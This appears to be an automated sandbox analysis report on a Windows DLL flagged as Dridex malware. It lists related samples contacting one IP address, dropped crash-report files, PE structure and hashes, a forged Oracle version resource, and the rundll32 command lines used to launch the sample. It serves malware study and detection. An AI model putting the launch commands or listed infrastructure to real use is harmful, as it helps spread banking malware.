                                                                                                                                                • 104.36.167.47
                                                                                                                                                L0mddDYjoL.dllGet hashmaliciousBrowse
                                                                                                                                                • 104.36.167.47
                                                                                                                                                hMUh2Mkqyi.dllGet hashmaliciousBrowse
                                                                                                                                                • 104.36.167.47
                                                                                                                                                hMUh2Mkqyi.dllGet hashmaliciousBrowse
                                                                                                                                                • 104.36.167.47
                                                                                                                                                E972ciDmtE.dllGet hashmaliciousBrowse
                                                                                                                                                • 104.36.167.47
                                                                                                                                                E972ciDmtE.dllGet hashmaliciousBrowse
                                                                                                                                                • 104.36.167.47
                                                                                                                                                4NEHGDB2q7.dllGet hashmaliciousBrowse
                                                                                                                                                • 104.36.167.47
                                                                                                                                                4NEHGDB2q7.dllGet hashmaliciousBrowse
                                                                                                                                                • 104.36.167.47
                                                                                                                                                ReMxcvxKeOzodickpenis.dllGet hashmaliciousBrowse
                                                                                                                                                • 104.36.167.47
                                                                                                                                                ReMxcvxKeOzodickpenis.dllGet hashmaliciousBrowse
                                                                                                                                                • 104.36.167.47
                                                                                                                                                UzgDinGRAz.dllGet hashmaliciousBrowse
                                                                                                                                                • 104.36.167.47
                                                                                                                                                nr29dWSsgF.dllGet hashmaliciousBrowse
                                                                                                                                                • 104.36.167.47
                                                                                                                                                UzgDinGRAz.dllGet hashmaliciousBrowse
                                                                                                                                                • 104.36.167.47
                                                                                                                                                nr29dWSsgF.dllGet hashmaliciousBrowse
                                                                                                                                                • 104.36.167.47
                                                                                                                                                OQjpM0PPCp.dllGet hashmaliciousBrowse
                                                                                                                                                • 104.36.167.47
                                                                                                                                                zNMgAlNt7a.dllGet hashmaliciousBrowse
                                                                                                                                                • 104.36.167.47
                                                                                                                                                OQjpM0PPCp.dllGet hashmaliciousBrowse
                                                                                                                                                • 104.36.167.47
                                                                                                                                                zNMgAlNt7a.dllGet hashmaliciousBrowse
                                                                                                                                                • 104.36.167.47
                                                                                                                                                VowAWbKvhX.dllGet hashmaliciousBrowse
                                                                                                                                                • 104.36.167.47
                                                                                                                                                ZXD1iYQeIh.dllGet hashmaliciousBrowse
                                                                                                                                                • 104.36.167.47

                                                                                                                                                JA3 Fingerprints

                                                                                                                                                No context

                                                                                                                                                Dropped Files

                                                                                                                                                No context

                                                                                                                                                Created / dropped Files

                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_929199edf0b5e1a671cd932c57bd132abfcfef1_82810a17_17b46e91\Report.wer
                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):65536
                                                                                                                                                Entropy (8bit):0.9969512980665527
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:JPiH0oXLHVzOMjed+J8/u7sxS274It7c:JPi5XrVzOMjev/u7sxX4It7c
                                                                                                                                                MD5:F0033206EB8AD55F047E545A9482C4FC
                                                                                                                                                SHA1:357E0C8E4966FF45179AAC1B2267E469617BED27
                                                                                                                                                SHA-256:580F1B6638CEC90D96D129D4E7A81C7E883052527FE33312E54BFB08D649C554
                                                                                                                                                SHA-512:370829816F6CE02BFECEAB66EB118811EBC23CA0B3DB680DDA85A44564D359B8889AD726836260EA81E40E44BE74CE906E17477BECAA1804A113A452B27EBC3E
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_fb9152841665ded0dbf17d9a73851f865888cee_82810a17_168461a0\Report.wer
                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):65536
                                                                                                                                                Entropy (8bit):0.9651697352998475
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:7dv6iD0oXPCHBUZMX4jed+JU/u7sxS274ItWc:Rv6idXSBUZMX4je//u7sxX4ItWc
                                                                                                                                                MD5:D599339891655D6254BF62FE10A78944
                                                                                                                                                SHA1:4FAF72D52A6FB4F891A9ABD30EC3909AE7A878D0
                                                                                                                                                SHA-256:90151AC6D1A756A1E8D302CADFA11C67F9C1356E188C11CA62012DD49AD9AFC0
                                                                                                                                                SHA-512:D21BA0B4483D38A3EBD255D5E0E6F9283158E3DCA1AA29C5A8D479E1632B95D7F0B27EA68EEB1031733699B6F9AC83A3EC86CD633E45EF77F2A047DE6C643984
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER4A30.tmp.dmp
                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                File Type:Mini DuMP crash report, 14 streams, Mon Dec 27 01:27:45 2021, 0x1205a4 type
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):47434
                                                                                                                                                Entropy (8bit):2.089972974158097
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:QjuMBqmBiU0zx+IbO5SkbuGssI+uOksRyWfJ9BRYf4ynhVGkoFbE0mnrK:gq5UG+15LbuGssIk9g4ynTGkyHmnrK
                                                                                                                                                MD5:1DFA4E8F9E2D879586116D458E321E87
                                                                                                                                                SHA1:3F7F518F7C55A9BCFBECE1ACF9FA8E2DF6EE7838
                                                                                                                                                SHA-256:EB14E0288F47EAE18EFEC8D3849AAF1BEF74CBF03C9C50CCB0211F0A3D113096
                                                                                                                                                SHA-512:BCE1008E74F16A52EA535CA4EEE287CFDB97EC00EB19C79B8A6339EBC7812138C2D86DA2868FAFE2295843E4DD9D7052A81EE505A09D653935238B1FA052BCFB
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER5201.tmp.WERInternalMetadata.xml
                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):8270
                                                                                                                                                Entropy (8bit):3.693943868682352
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:Rrl7r3GLNi466B6Y3s6fB2gmfT4DS7Cpry89b95psfCQX5m:RrlsNi96B6Yc6p2gmfTMSY95CfCI0
                                                                                                                                                MD5:1FF324457E7728C5BE90DF5B2613103E
                                                                                                                                                SHA1:827B125771E315405BD68CA1CE4AF1B194830E01
                                                                                                                                                SHA-256:1F9FF71BF40348304DD8F27406FF2DF60F5004F4ACB80E9EC8807B8A12FFC37B
                                                                                                                                                SHA-512:58DAB421D51B90EDF3676C663CDD4B36CCEC92FCA5061798F07B86FDC0E207DA846263C4E412B34250B8D48B52799AD6824A22BBFA6E2793CEF42BADB07DC057
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER54C1.tmp.xml
                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):4630
                                                                                                                                                Entropy (8bit):4.459475558463607
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:cvIwSD8zsYJgtWI9acWSC8BCM8fm8M4JCdsKDF3L+q8/bnV4SrSVd:uITfeZVSNMxJQLgDWVd
                                                                                                                                                MD5:F799FB0FD596A725DDCC1D3DF9DAACED
                                                                                                                                                SHA1:4A271A3432B71581C010D8EF7A7DA366E70F7DC4
                                                                                                                                                SHA-256:DAFF5ED97F257E6F2453BFA4A13FFF11D1C25C5283D6ADAF89140123618E3496
                                                                                                                                                SHA-512:3477196C7F55DFD8BB24B0DE3043D85F699DE43086BD2B896721250138427A64287143A7545521C357A5E753A7BDBAA42C6C7A04F3F72596E40AB8861ED9577B
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1315358" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER59B1.tmp.dmp
                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                File Type:Mini DuMP crash report, 15 streams, Mon Dec 27 01:27:50 2021, 0x1205a4 type
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):50532
                                                                                                                                                Entropy (8bit):2.124326452281166
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:29ugbqVKFhV2vj/Ef5O5SkbqiloDkqHmHMvGWj3HcUcW5+:LVSsr/q85LbqSneG6ncWg
                                                                                                                                                MD5:91E23ED71E3B58E5EF808982D171F677
                                                                                                                                                SHA1:3DE1EECA62BBBD8E51C878405D3990187071C11D
                                                                                                                                                SHA-256:0575CC672BFEAEB4E346D305AA36BEDE2B30CEF9B754FBA610BE09079D2CF221
                                                                                                                                                SHA-512:4EE5E844265C64C72D5720CF296E05E8D55FAF1E2F0012139CADDF94D0B79A674ACFA35F4056FCD73CA46037906FA10FDB925BB8EA45CF0E30F6030B10A11E2B
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER656A.tmp.WERInternalMetadata.xml
                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):8350
                                                                                                                                                Entropy (8bit):3.68971409405603
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:Rrl7r3GLNikF6i6YI66Qvgmf8xSwCpB789b9nysfxAXnm:RrlsNie6i6Yt6Ygmf8xSW9nxfam
                                                                                                                                                MD5:0332A2E72E7BB508D64678E5061D1AE0
                                                                                                                                                SHA1:0373BF515A54A7AD057E99FC6521431EEABEBCE3
                                                                                                                                                SHA-256:809AF7D048EDD6CEA31973B7F677488127587C25BBD63FE091CD76EA418F5DB5
                                                                                                                                                SHA-512:0E7C000A802F9B539D507CFAF42505007C60DFACF353853568328C6FFF9B8066F067A8736046605DEF2D03EF1A57A2F5D2C4D343E8BE078A359027464B18A302
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
Preview: <?xml version="1.0" encoding="UTF-16"?> <WERReportMetadata> <OSVersionInformation> <WindowsNTVersion>10.0</WindowsNTVersion> <Build>17134</Build> <Product>(0x30): Windows 10 Pro</Product> <Edition>Professional</Edition> <BuildString>17134.1.amd64fre.rs4_release.180410-1804</BuildString> <Revision>1</Revision> <Flavor>Multiprocessor Free</Flavor> <Architecture>X64</Architecture> <LCID>1033</LCID> </OSVersionInformation> <ProcessInformation> <Pid>6340</Pid>
                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER68B7.tmp.xml
                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):4731
                                                                                                                                                Entropy (8bit):4.443766600628613
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:cvIwSD8zsYJgtWI9acWSC8BI8fm8M4JCdsK7Ff8+q8vjsKp4SrSSd:uITfeZVSNbJvKzDWSd
                                                                                                                                                MD5:62007515FD1454403F933BA85C3AA38F
                                                                                                                                                SHA1:29C81AC3A501EB2C35CECA757B81906E2EB4F3B3
                                                                                                                                                SHA-256:5F16E55D31CA10A5B32119D1D0BD5F704BA780663729BE82C5B8CD50D0D48BB8
                                                                                                                                                SHA-512:CC4A38E56C4F4D60D4FCB312E5719877C3A319D56C41B3AA33D843C8738C2766824F60A66925A67507AE576D2114A785896723F0F4A8017B606B31BCDF82938A
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1315358" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                                                C:\Windows\appcompat\Programs\Amcache.hve
                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1572864
                                                                                                                                                Entropy (8bit):4.278251829968785
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:LveNC46gDrh7xM5E+mHAzjA4/yfMhdTjXOH0K3QZGRAXWv0BhcLJnW:reNC46gDrh7xM5IR
                                                                                                                                                MD5:F1EEDE3884835CB30D08C5C778213538
                                                                                                                                                SHA1:88A6A24CC0A2C596276DAB87A052ED38B49E5651
                                                                                                                                                SHA-256:2D5815003642357A42A131ECC5B8975053D7F77170AC1E664A222F1BB92AEB2A
                                                                                                                                                SHA-512:E7F01F2222C0D6F0841D4E58DFA26463E77230DED5A48BD95D5562B6AE9125EF0B10F7D6883B4A55389FF73D64C518DB2C37901D03074173F7FA8DE600DA1A18
                                                                                                                                                Malicious:false
                                                                                                                                                C:\Windows\appcompat\Programs\Amcache.hve.LOG1
                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):24576
                                                                                                                                                Entropy (8bit):4.036587068153938
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:D+1XJ5Rftx1pPJ4XmsFcnE7kKPBqXZSeq5QMVyi6+/gl4Lk49Zd1DoXznwXvwvo:K1XXRftx15J4XjFcE77BqXAeq5QMVyic
                                                                                                                                                MD5:186F9B0626F31F86600410AD679039E4
                                                                                                                                                SHA1:530359F4036224E5A0178952A2C3FC2124F07216
                                                                                                                                                SHA-256:6B0EB4872D3040CF239052A380E1EA8F00A942970D2D4C4D9531604F4F972B38
                                                                                                                                                SHA-512:1B91DFC012C93AD2A8AA17C9E7F0DEBA46579A85C438F15E498C51E53E4A8A9C89CABEC3F350CC0AE6A27B0F03870FECEE46DE7B3A37236C306D8BD71FEEC614
                                                                                                                                                Malicious:false

                                                                                                                                                Static File Info

                                                                                                                                                General

                                                                                                                                                File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                Entropy (8bit):7.269389698652151
                                                                                                                                                TrID:
                                                                                                                                                • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.20%
                                                                                                                                                • DOS Executable Generic (2002/1) 0.20%
                                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                File name:L0mddDYjoL.dll
                                                                                                                                                File size:536576
                                                                                                                                                MD5:0d9cc367aa4abc5620b6fcf8e9272f53
                                                                                                                                                SHA1:cb6db576bbe636a895d0ad3e3136483d0ec777be
                                                                                                                                                SHA256:1bd2e431f2631a5bfc21a9e244bb28d4230dad825b9d6396afcd32458923fb0a
                                                                                                                                                SHA512:f827b80e02a9fd180c6bc6d4261c1ce09d42f301f3137420942b8308688de5bbc6ed9d5945388f3ba5ac877f2211b5088b48fb72c8db10b97b81f0fdf60eb655
                                                                                                                                                SSDEEP:6144:yKMImhktm7mnmvetmzK/kxwv4Zm7mREqZzdazdULd54f3X0kdVtL8faGAPlX:y9hXAg5aX0CL8fI

                                                                                                                                                File Icon

                                                                                                                                                Icon Hash:74f0e4ecccdce0e4

                                                                                                                                                Static PE Info

                                                                                                                                                General

                                                                                                                                                Entrypoint:0x10005a10
                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                Digitally signed:false
                                                                                                                                                Imagebase:0x10000000
                                                                                                                                                Subsystem:windows gui
                                                                                                                                                Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                                                                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                                                                                                                                                Time Stamp:0x61B705D1 [Mon Dec 13 08:35:29 2021 UTC]
                                                                                                                                                TLS Callbacks:
                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                OS Version Major:5
                                                                                                                                                OS Version Minor:0
                                                                                                                                                File Version Major:5
                                                                                                                                                File Version Minor:0
                                                                                                                                                Subsystem Version Major:5
                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                Import Hash:e9192d34e4c9dcdf739aaa1d74025eb2

                                                                                                                                                Entrypoint Preview

                                                                                                                                                Instruction
                                                                                                                                                mov edx, 00000003h
                                                                                                                                                cmpps xmm1, xmm0, 02h
                                                                                                                                                add eax, 0Ch
                                                                                                                                                add eax, 0Ch
                                                                                                                                                add eax, 0Ch
                                                                                                                                                add eax, 0Ch
                                                                                                                                                add eax, 0Ch
                                                                                                                                                add eax, 0Ch
                                                                                                                                                cmp edx, 03h
                                                                                                                                                je 00007FD9B11697C2h
                                                                                                                                                int3
                                                                                                                                                int3
                                                                                                                                                int3
                                                                                                                                                int3
                                                                                                                                                int3
                                                                                                                                                int3
                                                                                                                                                int3
                                                                                                                                                int3
                                                                                                                                                int3
                                                                                                                                                int3
                                                                                                                                                int3
                                                                                                                                                int3
                                                                                                                                                push ebp
                                                                                                                                                mov ebp, esp
                                                                                                                                                push edi
                                                                                                                                                push ebx
                                                                                                                                                push esi
                                                                                                                                                and esp, FFFFFFF8h
                                                                                                                                                sub esp, 000000A0h
                                                                                                                                                mov eax, dword ptr [ebp+08h]
                                                                                                                                                mov ecx, 006B34C2h
                                                                                                                                                mov edx, dword ptr [esp+7Ch]
                                                                                                                                                mov dword ptr [esp+7Ch], 3CDA3086h
                                                                                                                                                mov dword ptr [esp+00000094h], 00000000h
                                                                                                                                                mov dword ptr [esp+00000090h], 006C4587h
                                                                                                                                                mov byte ptr [esp+7Ah], FFFFFFBDh
                                                                                                                                                mov dword ptr [esp+74h], 629729F9h
                                                                                                                                                mov byte ptr [esp+65h], FFFFFFF1h
                                                                                                                                                mov dword ptr [esp+38h], 694CC273h
                                                                                                                                                mov esi, dword ptr [esp+00000094h]
                                                                                                                                                mov edi, dword ptr [esp+00000090h]
                                                                                                                                                mov ebx, edi
                                                                                                                                                add ebx, 171E5389h
                                                                                                                                                mov dword ptr [esp+30h], eax
                                                                                                                                                mov eax, esi
                                                                                                                                                adc eax, 00000000h
                                                                                                                                                mov dword ptr [esp+48h], ebx
                                                                                                                                                mov dword ptr [esp+4Ch], eax
                                                                                                                                                mov dword ptr [esp+2Ch], edi
                                                                                                                                                mov dword ptr [esp+28h], ecx
                                                                                                                                                mov dword ptr [esp+24h], edx
                                                                                                                                                mov dword ptr [esp+20h], esi
                                                                                                                                                call 00007FD9B116D1C6h
                                                                                                                                                mov ecx, 4C276534h
                                                                                                                                                mov edx, dword ptr [esp+2Ch]

Data Directories

Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x780d0          0x64          .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT          0x781b0          0x17c         .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x82000          0x2f0         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x83000          0x1214        .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x90f0           0x38          .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x9000           0xe8          .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

Sections

Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy         Characteristics
.text   0x1000           0x74d8        0x8000    False     0.360137939453   data       4.61046868402   IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata  0x9000           0x6fb7f       0x70000   False     0.311187744141   data       7.37787835354   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data   0x79000          0x80f4        0x7000    False     0.295828683036   data       6.02916609898   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc   0x82000          0x2f0         0x1000    False     0.090087890625   data       0.784979301457  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x83000          0x1214        0x2000    False     0.287475585938   data       4.27724948186   IMAGE_SCN_TYPE_COPY, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name        RVA      Size   Type                                 Language  Country
RT_VERSION  0x82060  0x290  MS Windows COFF PA-RISC object file  English   United States

Imports

DLL           Import
KERNEL32.dll  CreateFileW, GetProcessVersion, GetModuleFileNameW, CloseHandle, VirtualAllocEx, DeleteTimerQueue, InitAtomTable
msvcrt.dll    wcscoll
SETUPAPI.dll  SetupDiOpenDeviceInterfaceW
WININET.dll   InternetReadFile
RPCRT4.dll    RpcMgmtSetCancelTimeout, NdrGetUserMarshalInfo
LZ32.dll      LZCopy
USER32.dll    BlockInput, TranslateMessage, FillRect, GetWindowTextA, DefMDIChildProcW, GetWindowContextHelpId, IsWinEventHookInstalled, GetClassNameA
NTDSAPI.dll   DsGetDomainControllerInfoW
IPHLPAPI.DLL  GetIpAddrTable
WS2_32.dll    WSACleanup, inet_addr
IMM32.dll     ImmGetCandidateListW
ADVAPI32.dll  CreateRestrictedToken, CryptGenKey, CryptAcquireContextW, RegCloseKey, CryptContextAddRef
GDI32.dll     GetViewportOrgEx, SetWindowOrgEx
pdh.dll       PdhAddCounterW
ole32.dll     CoCreateInstanceEx, CoGetObjectContext, StringFromGUID2
WINMM.dll     waveOutGetPitch
SHLWAPI.dll   AssocGetPerceivedType
ESENT.dll     JetInit

Exports

Name                Ordinal  Address
Wgpomsdeeomtunmdrt  1        0x10078125

Version Infos

Description       Data
OriginalFilename  Hen.dll
FileDescription   Oracle Call Interface
FileVersion       7.0.2.1.0
Legal Copyright   Copyright Oracle Corporation 1979, 2001. All rights reserved.
CompanyName       Oracle Corporation
Translation       0x0409 0x04b0

Possible Origin

Language of compilation system  Country where language is spoken
English                         United States

                                                                                                                                                Network Behavior

                                                                                                                                                No network behavior found

                                                                                                                                                System Behavior

                                                                                                                                                General

                                                                                                                                                Start time:17:27:03
                                                                                                                                                Start date:26/12/2021
                                                                                                                                                Path:C:\Windows\System32\loaddll32.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:loaddll32.exe "C:\Users\user\Desktop\L0mddDYjoL.dll"
                                                                                                                                                Imagebase:0x1320000
                                                                                                                                                File size:116736 bytes
                                                                                                                                                MD5 hash:7DEB5DB86C0AC789123DEC286286B938
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000001.00000002.685190249.000000006E9A1000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                                                                Reputation:moderate

                                                                                                                                                General

                                                                                                                                                Start time:17:27:03
                                                                                                                                                Start date:26/12/2021
                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\L0mddDYjoL.dll",#1
                                                                                                                                                Imagebase:0xd80000
                                                                                                                                                File size:232960 bytes
                                                                                                                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high

                                                                                                                                                General

                                                                                                                                                Start time:17:27:04
                                                                                                                                                Start date:26/12/2021
                                                                                                                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:rundll32.exe C:\Users\user\Desktop\L0mddDYjoL.dll,Wgpomsdeeomtunmdrt
                                                                                                                                                Imagebase:0xeb0000
                                                                                                                                                File size:61952 bytes
                                                                                                                                                MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000005.00000000.371795691.000000006E9A1000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000005.00000000.369759856.000000006E9A1000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                                                                Reputation:high

                                                                                                                                                General

                                                                                                                                                Start time:17:27:04
                                                                                                                                                Start date:26/12/2021
                                                                                                                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:rundll32.exe "C:\Users\user\Desktop\L0mddDYjoL.dll",#1
                                                                                                                                                Imagebase:0xeb0000
                                                                                                                                                File size:61952 bytes
                                                                                                                                                MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000006.00000000.363470341.000000006E9A1000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000006.00000002.389367218.000000006E9A1000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000006.00000000.365127503.000000006E9A1000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                                                                Reputation:high

                                                                                                                                                General

                                                                                                                                                Start time:17:27:41
                                                                                                                                                Start date:26/12/2021
                                                                                                                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4988 -s 728
                                                                                                                                                Imagebase:0x1000000
                                                                                                                                                File size:434592 bytes
                                                                                                                                                MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high

                                                                                                                                                General

                                                                                                                                                Start time:17:27:44
                                                                                                                                                Start date:26/12/2021
                                                                                                                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6340 -s 848
                                                                                                                                                Imagebase:0x1000000
                                                                                                                                                File size:434592 bytes
                                                                                                                                                MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high

                                                                                                                                                Disassembly

                                                                                                                                                Code Analysis

                                                                                                                                                  Executed Functions

                                                                                                                                                  C-Code - Quality: 83%
                                                                                                                                                  			E6E9B0730(void* __ecx) {
